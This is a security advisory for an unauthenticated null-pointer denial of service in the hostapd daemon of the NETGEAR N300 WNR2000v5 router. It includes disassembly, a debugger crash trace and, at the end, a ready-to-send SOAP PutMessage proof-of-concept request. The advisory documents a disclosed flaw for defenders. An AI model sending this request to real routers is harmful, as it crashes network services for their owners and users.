NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability

Summary

An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.

Tested Versions

NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70

Product URLs

<https://www.netgear.com/support/product/WNR2000v5&gt;

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476: NULL Pointer Dereference

Details

The NETGEAR n300 is a small, affordable wireless router with minimal features.

When a specific SOAP request is sent to the hostapd daemon, web_connection_check_data() calls another function wps_process_msg() with invalid arguments under certain conditions.

0x44e5d4 <web_connection_check_data+2372>: lw a0,20(s1) 0x44e5d8 <web_connection_check_data+2376>: move a1,zero => 0x44e5dc <web_connection_check_data+2380>: jalr t9 // call wps_process_msg() 0x44e5e0 <web_connection_check_data+2384>: move a2,v0

The problem is that there is no validation to determine if M1 data has been received. This is normally performed by the GetDeviceInfo() method:

POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo"
Content-type: text/xml
Content-Length: 320

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body>.<m:GetDeviceInfo xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">.</m:GetDeviceInfo></SOAP-ENV:Body></SOAP-ENV:Envelope>

This method will populate a structure later passed to wps_process_msg. However, if GetDeviceInfo() has not been called by a client since the daemon started, it will crash when attempting to dereference the structure passed passed to this function.

  0044e5d4     lw                  a0,0x14(s1)         // $a0 == 0x00
  0044e5d8     clear               a1
  0044e5dc     jalr                t9=>wps_process_msg
  0044e5e0     _move               a2,v0

Crash Information

Program received signal SIGSEGV, Segmentation fault.
0x0043cc7c in ?? ()

   0x43cc70 <wps_get_msg+24>:	lw	t9,-31756(gp)
   0x43cc74 <wps_get_msg+28>:	jr	t9
   0x43cc78 <wps_get_msg+32>:	nop
=> 0x43cc7c <wps_process_msg>:	lw	v0,4(a0)          // Crash
   0x43cc80 <wps_process_msg+4>:	lui	gp,0x49
   0x43cc84 <wps_process_msg+8>:	beqz	v0,0x43cc94 <wps_process_msg+24>
   0x43cc88 <wps_process_msg+12>:	addiu	gp,gp,6416
   0x43cc8c <wps_process_msg+16>:	b	0x43cc98 <wps_process_msg+28>
   0x43cc90 <wps_process_msg+20>:	lw	t9,-30984(gp)


peda-mips > x/32xw $a0
0x0:	Cannot access memory at address 0x0

peda-mips > bt
#0  0x0043cc7c in wps_process_msg ()
#1  0x0044e5e4 in web_connection_check_data ()
#2  0x004515fc in httpread_read_handler ()
#3  0x00421ff8 in eloop_sock_table_dispatch ()
#4  0x004226ec in eloop_run ()
#5  0x00408068 in main ()

Exploit Proof of Concept

# Send to <router_ip>:49152
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage"
Host: 192.168.1.1:49152
Content-Type: text/xml
Content-Length: 357

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
.<m:PutMessage xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewInMessage>AAAA</NewInMessage>
.</m:PutMessage>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Timeline

2019-05-08 - Vendor Disclosure
2019-09-09 - Public Release